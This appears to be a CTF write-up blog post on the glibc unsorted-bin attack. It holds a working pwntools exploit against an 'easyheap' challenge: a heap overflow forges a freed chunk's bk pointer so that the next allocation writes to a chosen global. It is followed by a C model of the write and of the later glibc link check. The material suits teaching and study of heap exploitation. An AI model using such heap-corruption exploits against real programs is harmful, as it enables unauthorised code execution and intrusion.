
unsortbin attack

Date: 2022-11-21 15:36:31
Tags: unsortbin index create content attack 0x80 str sendlineafter

 

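The unsorted bin is a circular doubly linked list that is processed first in, first out (FIFO).

If the unsorted bin contains only one chunk, that chunk's fd and bk pointers both point to main_arena + an offset.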

https://mp.weixin.qq.com/s/1KhiulR-webHsBZhUzQzKg

https://blog.csdn.net/qq_36495104/article/details/106246762

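from pwn import *

#context.log_level='debug'

#p=process("./easyheap")
p=remote("redirect.do-not-trust.hacking.run",10413)
e=ELF("./easyheap")

#context.terminal=["gnome-terminal","-x","sh","-c"]
#gdb.attach(p)

# Menu helpers for the easyheap binary; all data is sent as bytes so the script runs on Python 3
def create(size,content):
    p.sendlineafter(b"Your choice :",b"1")
    p.sendlineafter(b"Size of Heap : ",str(size).encode())
    p.sendlineafter(b"Content of heap:",content)

def edit(index,size,content):
    p.sendlineafter(b"Your choice :",b"2")
    p.sendlineafter(b"Index :",str(index).encode())
    p.sendlineafter(b"Size of Heap : ",str(size).encode())
    p.sendlineafter(b"Content of heap : ",content)


def delete(index):
    p.sendlineafter(b"Your choice :",b"3")
    p.sendlineafter(b"Index :",str(index).encode())

fd=0
magic=0x6020c0  # address that receives the unsorted bin write

#start to attack
# Chunk 0 (0x10) sits directly before chunk 1 (0x80); chunk 2 keeps chunk 1 from merging with the top chunk
create(0x10,b"a"*0x10)
create(0x80,b"b"*0x80)
create(0x80,b"c"*0x80)

delete(1)  # chunk 1 goes into the unsorted bin
# Overflow from chunk 0: 0x18 filler bytes, chunk 1's size field (0x91), then its fd and bk (bk = magic-0x10)
payload=b"d"*0x18+p64(0x91)+p64(fd)+p64(magic-0x10)
edit(0,0x30,payload)
# Allocating 0x80 removes chunk 1 from the bin; the store to bk->fd lands on magic
create(0x80,b"aaa")

p.sendlineafter(b":",str(4869).encode())
p.interactive()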
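
How the final `create(0x80, ...)` in the script turns a forged bk into a write at bk+0x10, shown as a small C model; this is an added example, not code from the original post or from glibc. The names `struct chunk`, `union target`, `bin_insert`, `bin_take` and `simulate` are hypothetical, a 64-bit layout is assumed, and the `checked` path mirrors the link test that glibc 2.29 and later perform before removing a chunk from the unsorted bin.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Simplified chunk header (hypothetical model); the bin head in main_arena is modelled as a chunk too. */
struct chunk { uint64_t prev_size, size; struct chunk *fd, *bk; };
_Static_assert(offsetof(struct chunk, fd) == 0x10, "64-bit layout assumed");

/* Overlay so the word at offset 0x10 (the fd slot) can be read back as plain data. */
union target { struct chunk as_chunk; uint64_t words[4]; };

/* free(): link a chunk at the head of the circular list. */
static void bin_insert(struct chunk *bin, struct chunk *c) {
    c->fd = bin->fd; c->bk = bin;
    bin->fd->bk = c; bin->fd = c;
}

/* malloc(): take the oldest chunk (bin->bk). checked=1 adds the link test. */
static int bin_take(struct chunk *bin, int checked) {
    struct chunk *victim = bin->bk, *bck = victim->bk;
    if (checked && (bck->fd != victim || victim->fd != bin))
        return -1;                 /* a hardened allocator aborts here */
    bin->bk = bck;
    bck->fd = bin;                 /* 8-byte store at (char *)bck + 0x10 */
    return 0;
}

/* Returns 1 if the word at target+0x10 now holds the bin address, 0 if untouched. */
static int simulate(int corrupt_bk, int checked) {
    struct chunk bin = { 0, 0, NULL, NULL };
    struct chunk freed = { 0, 0x91, NULL, NULL };   /* constructed sample chunk */
    union target t = { .words = { 0, 0, 0, 0 } };
    bin.fd = bin.bk = &bin;        /* an empty bin points at itself */
    bin_insert(&bin, &freed);      /* single chunk: fd and bk both point at the bin */
    if (freed.fd != &bin || freed.bk != &bin) return -2;
    if (corrupt_bk)
        freed.bk = &t.as_chunk;    /* stands in for the overflow setting bk = magic-0x10 */
    bin_take(&bin, checked);
    return t.words[2] == (uint64_t)(uintptr_t)&bin;
}

int main(void) {
    printf("intact list, unchecked take: %d\n", simulate(0, 0));
    printf("forged bk,   unchecked take: %d\n", simulate(1, 0));
    printf("forged bk,   checked take  : %d\n", simulate(1, 1));
    return 0;
}
```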

  

From: https://www.cnblogs.com/iGhost/p/16911507.html
